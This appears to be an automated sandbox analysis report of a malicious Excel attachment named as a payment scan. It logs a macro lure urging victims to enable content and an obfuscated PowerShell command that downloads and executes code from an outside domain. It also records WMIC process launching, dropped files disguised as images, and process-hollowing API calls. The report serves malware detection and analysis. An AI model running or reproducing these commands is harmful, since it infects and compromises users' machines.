      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://onedrive.live.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://settings.outlook.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://tasks.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgWindows user hook set: 0 mouse low level NULL

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Content 5 Al - " ;& r 6 I A I B C D E F I G I H I I I J C 7 8 1 9 2 10 3 11 4
      Source: Screenshot number: 8Screenshot OCR: Enable Editing" form the yellow bar and then click 5 8 "Enable Content" ,6 g 7 10 ,8 11 ,9 12
      Source: Screenshot number: 8Screenshot OCR: Enable Content X ' . Al " (" jR " 5 7 A B I C I D I, E I F G H I J K 'T , 1 I y 3 2 : Qil D?'
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 0000001A.00000002.345078681.00000000035D0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\WMIC.exeWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWinSta0\Default
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: Scanned_25526662-Payment.xlsInitial sample: EXEC
      Powershell drops PE fileShow sources
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_022100C7 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221002C NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221000B NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210072 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_005C6B10: new,DeviceIoControl,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006940D0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006849A0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0040EA7D
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004F2AA7
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0042ABC1
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0068321E
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00411532
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004276C4
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00689D67
      Source: Scanned_25526662-Payment.xlsOLE indicator, VBA macros: true
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 006876A0 appears 81 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 006811C5 appears 69 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 006B08FC appears 794 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 00411C35 appears 39 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 00680E81 appears 125 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 006850AE appears 33 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 005CEF10 appears 131 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 00411FB1 appears 168 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: String function: 00696B06 appears 44 times
      Source: nwaha3c5.dll.21.drStatic PE information: No import functions for PE file found
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: Scanned_25526662-Payment.xls, type: SAMPLEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: C:\Users\user\Desktop\1BA10000, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: Test3.jpg.23.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@19/22@1/2
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMutant created: \Sessions\1\BaseNamedObjects\693cae42864dd7a2e04c35636e49f749
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{BF342920-9C68-4407-BD39-EA487E52A3EE} - OProcSessId.datJump to behavior
      Source: Scanned_25526662-Payment.xlsOLE indicator, Workbook stream: true
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Scanned_25526662-Payment.xlsVirustotal: Detection: 14%
      Source: Scanned_25526662-Payment.xlsReversingLabs: Detection: 15%
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
      Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

      Data Obfuscation:

      barindex
      PowerShell case anomaly foundShow sources
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00402F43 pushfd ; iretd
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00682156 push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006B08FC push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006B099C push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00400F04 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0068118E push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0042BBAE push eax; ret
      Source: initial sampleStatic PE information: section name: .text entropy: 7.92605680707

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dllJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Test3.jpgJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Test1.txtJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Test3.jpgJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
